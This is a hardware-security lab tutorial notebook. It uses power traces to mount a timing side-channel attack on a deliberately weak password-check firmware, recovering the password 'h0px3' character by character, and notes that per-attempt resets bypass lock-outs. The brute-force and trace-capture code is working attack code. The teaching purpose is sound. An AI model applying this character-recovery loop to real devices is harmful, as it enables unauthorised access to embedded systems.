# Timing Analysis with Power for Password Bypass

Supported setups:

SCOPES:

* OPENADC
* CWNANO

PLATFORMS:

* CWLITEARM
* CWLITEXMEGA
* CWNANO

This tutorial will introduce you to breaking devices by determining when a device is performing certain operations. It will use a simple password check, and demonstrate how to perform a basic power analysis.

Note this is not a prerequisite to the tutorial on breaking AES. You can skip this tutorial if you wish to go ahead with the AES tutorial.

In [1]:
SCOPETYPE = 'OPENADC'
PLATFORM = 'OpenTitan'  # 'CWLITEARM'
CRYPTO_TARGET = 'NONE'

## Firmware

Like before, we'll need to setup our `PLATFORM`, then build the firmware:

In [ ]:
%%bash -s "$PLATFORM" "$CRYPTO_TARGET"
cd ../hardware/victims/firmware/basic-passwdcheck
make PLATFORM=$1 CRYPTO_TARGET=$2

## Setup

Setup is the same as usual, except this time we'll be capturing 2000 traces.

In [ ]:
# Subprocess
import subprocess
from subprocess import PIPE
# Serial communication
import serial

In [ ]:
# Connect to scope and target
%run "Helper_Scripts/Setup_OpenTitan.ipynb"
# Connect to serial via pipe
connectSerial(target)

## Build and Flash SW to Arty S7

In [ ]:
# Build and Flash SW to Arty S7
flash_file = 'build_basic.sh'
file_path = '/home/ms/opentitan'

# Reset Target and Flash SW
reset_target(scope)
time.sleep(0.025)
flash_software(flash_file, file_path)

## Communicating With The Target

As was mentioned at the beginning of the tutorial, the firmware we loaded onto the target implements a basic password check. After getting a `'\n'` terminated password, the target checks it and enters an infinite loop, so before communicating with it, we'll need to reset it.

We'll be doing this a lot, so we'll define a function that resets the target (this function is also available by running "Helper_Scripts/Setup_OpenTitan.ipynb" as we did above):

In [ ]:
# Define Reset_Target, already available in "Helper_Scripts/Setup_OpenTitan.ipynb"
import time
def reset_target(scope):
    if PLATFORM == "CW303" or PLATFORM == "CWLITEXMEGA":
        scope.io.pdic = 'low'
        time.sleep(0.05)
        scope.io.pdic = 'high'
        time.sleep(0.05)
    # Reset pin in OpenTitan layout has to be connected to pdic pin of ChipWhisperer 
    if PLATFORM == "OpenTitan":
        scope.io.pdic = 'low'
        time.sleep(0.05)
        scope.io.pdic = 'high'
        time.sleep(0.05)
        #flash_file = 'build_basic.sh'
        #pipe = subprocess.run(flash_file, stdout=PIPE, cwd='/home/ms/opentitan')
    else:  
        scope.io.nrst = 'low'
        time.sleep(0.05)
        scope.io.nrst = 'high'
        time.sleep(0.05)

The target sends some text to us upon starting. After running the block below, you should see some text appear. 

**NOTE**
The text may appear cutoff, accompanied by a message about data loss. This means that the buffer used to store serial data (128 bytes) from the target is full. This isn't an issue here, since the text is just aesthetic, but keep this in mind if you want to do large transfers of serial data using ChipWhisperer. 

In [ ]:
result = ""
ret = bytes()
reset_target(scope)
time.sleep(0.025)
flash_software(flash_file, file_path)
time.sleep(4)
target.flush()

num_char = target.in_waiting()
print(num_char)
while num_char > 0:
    ret += target.read()
    time.sleep(0.05)
    num_char = target.in_waiting()
    
if ret:
    result = ret.decode("utf-8")
    result = result.split("*****", 1)
    print(result[1])
#print(ret)

Now we can send the target a password:

In [ ]:
time.sleep(0.25)
#target.flush()

ENDCMD = '\n'
message = 'h0px3'

text = message + ENDCMD
text_enc = text.encode()

target.write(text_enc)
#time.sleep(0.5)

And get the response. We sent it the right password (h0px3), so you should see "Access granted, Welcome!":

In [ ]:
CORG = '\x1b[6;39;43m'
CBLACK  = '\33[30m'
CEND = '\033[0m'

resp = bytes()
resp += target.read()

if resp:
    print(CORG + CBLACK + resp.decode("utf-8") + CEND)
        
#print(target.read())

**tip**

In real systems, you may often know one of the passwords, which is sufficient to investigate the password checking routines as we will do. You also normally have an ability to reset passwords to default. While the reset procedure would erase any data you care about, the attacker will be able to use this 'sacrificial' device to learn about possible vulnerabilities. So the assumption that we have access to the password is really just saying we have access to a password, and will use that knowledge to break the system in general.

## Recording Traces

Now that we can communicate with our super-secure system, our next goal is to get a power trace while the target is running. To do this, we'll arm the scope just before we send our password attempt, then record the trace as we've done before.

In [ ]:
if PLATFORM == "CWNANO":
    scope.adc.samples = 800
elif PLATFORM == "OpenTitan":
    scope.adc.samples = 1500 # 2000
    scope.gain.db = 50

In [ ]:
result = ""
ret = bytes()
reset_target(scope)
time.sleep(0.025)
flash_software(flash_file, file_path)
time.sleep(4)
num_char = target.in_waiting()
while num_char > 0:
    ret += target.read()
    time.sleep(0.01)
    num_char = target.in_waiting()
    
if ret:
    result = ret.decode("utf-8")
    result = result.split("*****", 1)
    print(result[1])

retrn = ""
scope.arm()
target.flush()
ENDCMD = '\n'
message = 'h0px3'

text = message + ENDCMD # "h0px3\n"
text_enc = text.encode()
target.write(text_enc)
retrn = scope.capture()
if retrn:
    print('Timeout happened during acquisition')
        
trace = scope.get_last_trace()
resp = bytes()
num_char = target.in_waiting()
while num_char > 0:
    resp += target.read()
    time.sleep(0.01)
    num_char = target.in_waiting()
if resp:
    print(CORG + CBLACK + resp.decode("utf-8") + CEND)

Now that we have a trace, we'll plot it:

In [ ]:
# Define zoom function
%matplotlib notebook
import matplotlib.pylab as plt

def zoom_factory(ax,base_scale = 2.):
    def zoom_fun(event):
        # get the current x and y limits
        cur_xlim = ax.get_xlim()
        cur_ylim = ax.get_ylim()
        cur_xrange = (cur_xlim[1] - cur_xlim[0])*.5
        cur_yrange = (cur_ylim[1] - cur_ylim[0])*.5
        xdata = event.xdata # get event x location
        ydata = event.ydata # get event y location
        if (event.button) == 'up':
            # deal with zoom in
            scale_factor = 1/base_scale
        elif (event.button) == 'down':
            # deal with zoom out
            scale_factor = base_scale
        else:
            # deal with something that should never happen
            scale_factor = 1
            print (event.button)
        # set new limits
        ax.set_xlim([xdata - cur_xrange*scale_factor,
                     xdata + cur_xrange*scale_factor])
        ax.set_ylim([ydata - cur_yrange*scale_factor,
                     ydata + cur_yrange*scale_factor])
        plt.draw() # force re-draw

    fig = ax.get_figure() # get the figure of interest
    # attach the call back
    fig.canvas.mpl_connect('scroll_event',zoom_fun)

    #return the function
    return zoom_fun

#def on_plot_hover(event):
    # Iterating over each data member plotted
    #for curve in plot.get_lines():
        # Searching which data member corresponds to current mouse position
        #if curve.contains(event)[0]:
            #print ("over %s" % curve.get_gid())"""


#fig =  plt.figure()
#myplot = plt.plot(trace)
#fig.canvas.mpl_connect('motion_notify_event', on_plot_hover) 
#ax = plt.gca()
# #ax3.margins(x=0, y=-0.25)   # Values in (-0.5, 0.0) zooms in to center
#scale = 1.5
#f = zoom_factory(ax,base_scale = scale)

In [ ]:
# Plot and pick

fig = plt.figure();
ax = fig.add_subplot(111)
ax.plot(trace, 'g')

def onclick(event):
    a = ('button=%d, x=%d, y=%d, xdata=%f, ydata=%f' %
          (event.button, event.x, event.y, event.xdata, event.ydata))
    ax.set_title(a)

cid = fig.canvas.mpl_connect('button_press_event', onclick)

plt.show()

## Timing Analysis

Now that we can capture traces, we can begin planning our attack. First we'll make a function to guess a password and return a power trace, since we'll be repeating those steps a lot:

In [ ]:
def cap_pass_trace(pass_guess):
    ret = bytes()
    resp = ""
    reset_target(scope)
    time.sleep(0.05)
    flash_software(flash_file, file_path)
    time.sleep(4)
    
    num_char = target.in_waiting()
    while num_char > 0:
        ret += target.read() # num_char, 10
        time.sleep(0.01)
        num_char = target.in_waiting()

    scope.arm()
    target.write(pass_guess.encode())
    time.sleep(0.05)
    resp = scope.capture()
    if resp:
        print('Timeout happened during acquisition')

    trace = scope.get_last_trace()
    return trace

Next, we'll try two different passwords and see if the power traces differ by length. We'll then plot both traces on the same figure (with the first in red and the second in blue).

In [ ]:
%matplotlib notebook
import matplotlib.pylab as plt
from scipy.signal import find_peaks

scope.adc.samples = 1500
scope.gain.db = 48

t_correct = "h\n"
t_false = "\n"
trace_correct = cap_pass_trace(t_correct)
trace_wrong   = cap_pass_trace(t_false)     

#ax = plt.gca()

scale = 1.5


fig = plt.figure();
ax = fig.add_subplot(111)
#ax.plot(trace)
ax.plot(trace_wrong, 'r')
ax.plot(trace_correct, 'g')
#plt.ylim(-0.07, 0.07)
#plt.xlim(1800, 3000)
#ax.ylim(-0.7, 0.7)
#ax.xlim(0, 3000)

def onclick(event):
    a = ('button=%d, x=%d, y=%d, xdata=%f, ydata=%f' %
          (event.button, event.x, event.y, event.xdata, event.ydata))
    ax.set_title(a)

cid = fig.canvas.mpl_connect('button_press_event', onclick)
f = zoom_factory(ax,base_scale = scale)
plt.show()

In [ ]:
# Find peaks in graph
fig = plt.figure();
peaks, _ = find_peaks(trace_wrong, distance=30)
peaks2, _ = find_peaks(-trace_wrong, distance=15, prominence=(0.28, None))
peaks3, _ = find_peaks(trace_wrong, width=30)
peaks4, _ = find_peaks(trace_wrong, threshold=-0.5)     # Required vertical distance to its direct neighbouring samples, pretty useless
plt.subplot(2, 2, 1)
plt.plot(peaks, trace_wrong[peaks], "xb"); plt.plot(trace_wrong, 'r'); plt.legend(['distance'])
plt.subplot(2, 2, 2)
plt.plot(peaks2, trace_wrong[peaks2], "xb"); plt.plot(trace_wrong, 'r'); plt.legend(['prominence'])
plt.subplot(2, 2, 3)
plt.plot(peaks3, trace_wrong[peaks3], "xb"); plt.plot(trace_wrong, 'r'); plt.legend(['width'])
plt.subplot(2, 2, 4)
plt.plot(peaks4, trace_wrong[peaks4], "xb"); plt.plot(trace_wrong, 'r'); plt.legend(['threshold'])
plt.show()
print(peaks2)
print(trace_wrong[peaks2])
print(len(peaks2))

You should see both traces start and end similarly, but differ elsewhere. If you look closely, you should see that the blue trace looks a lot like the red trace but shifted later in time. We'll use this timing difference to break the password!

Edit the above block to try different passwords and see how it changes for different lengths and number of correct characters. 

Go back to the original guesses (`"\n"` and `"h\n"`) and find some distinct spikes that get shifted in time. Your target may differ, but in my case, there were some distinct spikes of about -0.25 at 229 in red and 265 in blue. The plot is interactive, so you can zoom in and move around using the buttons on the right side of the plot. Record their locations, value, and the difference in location (in my case, 229, 265, -0.25, and 36). 

Using distinct peaks may not always work. Instead of distinct peaks you can use where the two traces start to diverge. At the beginning the power traces are similar even though the number of characters correct is different. However, there is a point where they start to become significantly different. If you can find this spot you can use this spot to do the timing analysis instead. The difference in location should be the same as when using distinct peaks.

An even easier way to see this is to simply plot *every* possible first letter. If there is some sort of timing attack, we should see everything take one path, except for a single outlier. Let's try plotting a few traces this way and hope we get an interesting outlier.

In [ ]:
%matplotlib notebook
import matplotlib.pylab as plt

trylist = "abcdefghijklmnopqrstuvwxyz0123456789"
for c in trylist:
    next_pass = c + "\n"
    trace = cap_pass_trace(next_pass)
    plt.plot(trace)

## Attacking a Single Letter

Now that we've located a distinctive timing difference, we can start building our attack. We'll start with a single letter, since that will quickly give us some feedback on the attack.

The plan for the attack is simple: keep guessing letters until we no longer see the distinctive spike in the original location. To do this, we'll create a loop that:

* Figures out our next guess
* Does the capture and records the trace
* Checks if sample 229 is larger than -0.2 (replace with appropriate values)

To make things a little easier for later, we'll make a function that will return whether our spike is (guess incorrect) or isn't (guess correct) in the right location:

In [ ]:
#print(PLATFORM)
def checkpass(trace, i):
    if PLATFORM == "CWNANO":
        #There's a bit of jitter
        return (trace[228 + 11*i] < 3 and trace[227 + 11*i] < 0.3)
    elif PLATFORM == "CWLITEARM" or PLATFORM == "CW308_STM32F3":
        return trace[229 + 36*i] > -0.2
    elif PLATFORM == "CW303" or PLATFORM == "CWLITEXMEGA":
        return trace[73 + 40 * i] > -0.3
    elif PLATFORM == "OpenTitan":
        return trace[35 + 40 * i] > -0.15
    
def checkpass_array(trace, peaks):
    result = []
    if PLATFORM == "OpenTitan":
        for xi in peaks:
            #result = trace[xi] > -0.2
            if (trace[int(xi)] > -0.2):
                #print("found\n")
                result.append(int(xi))
        return result

The below loop finds the first correct character, prints it, then ends. You should see "Success: h" after a while.

In [ ]:
trylist = "abcdefghijklmnopqrstuvwxyz0123456789"
password = ""
#xr = [502, 531, 582, 685, 818]
#xg = [490, 569, 628, 810, 815]
#peaks, _ = find_peaks(trace, distance=30)
peaks2, _ = find_peaks(-trace_wrong, distance=15, prominence=(0.28, None))
peaks2_filt = [i for i in peaks2 if i >= 200]
print(len(peaks2_filt))
print(peaks2_filt)
print("\n")
res = []
for c in trylist:
    next_pass = password + c + "\n"
    trace = cap_pass_trace(next_pass)

    #if checkpass(trace, 0):
    res = checkpass_array(trace, peaks2_filt)
    if res:
        print("Success: " + c + "\n")
        print("Success: " + str(res) + ":" + str(trace[res]) + "\n")
        print("\n")
        #break

xi = res

In [ ]:
fig = plt.figure();
print(str(xi) + " | " + str(trace[xi]))
plt.subplot(1, 1, 1)
plt.plot(xi, trace[xi], "xb"); plt.plot(trace, 'r'); plt.legend(['guess pwd'])
plt.show()

Note that you will likely need to change the values in `checkpass`, or simply define your own `checkpass()` function.

In [ ]:
if c != 'h':
    raise ValueError("Incorrect guess - you need to adjust the comparison location and/or direction to make this work")

## Attacking the Full Password

Now that we can guess a single character, attacking the rest is easy; we just need to repeat the process in another loop, move the check point (this is the change is location you recorded earlier), and update our guess with the new correct letter.

After updating the below script and running it, you should see parts of the password printed out as each letter is found.

In [ ]:
trylist = "abcdefghijklmnopqrstuvwxyz0123456789"
password = ""
for i in range(5):
    for c in trylist:
        next_pass = password + c + "\n"
        trace = cap_pass_trace(next_pass)
        if checkpass(trace, i):
            password += c
            print("Success, pass now {}".format(password))
            break

That's it! You should have successfully cracked a password using the timing attack. Some notes on this method:

* The target device has a finite start-up time, which slows down the attack. If you wish, remove some of the `printf()`'s from the target code, recompile and reprogram, and see how quickly you can do this attack.
* The current script doesn't look for the "WELCOME" message when the password is OK. That is an extension that allows it to crack any size password.
* If there were a lock-out on a wrong password, the system would ignore it, as it resets the target after every attempt.

## Conclusion

This tutorial has demonstrated the use of the power side-channel for performing timing attacks. A target with a simple password-based security system is broken.

In [ ]:
scope.dis()
target.dis()

## Tests

In [ ]:
assert (password == "h0px3"), "Failed to break password, got {}.\nIf on Nano, may need to rerun".format(password)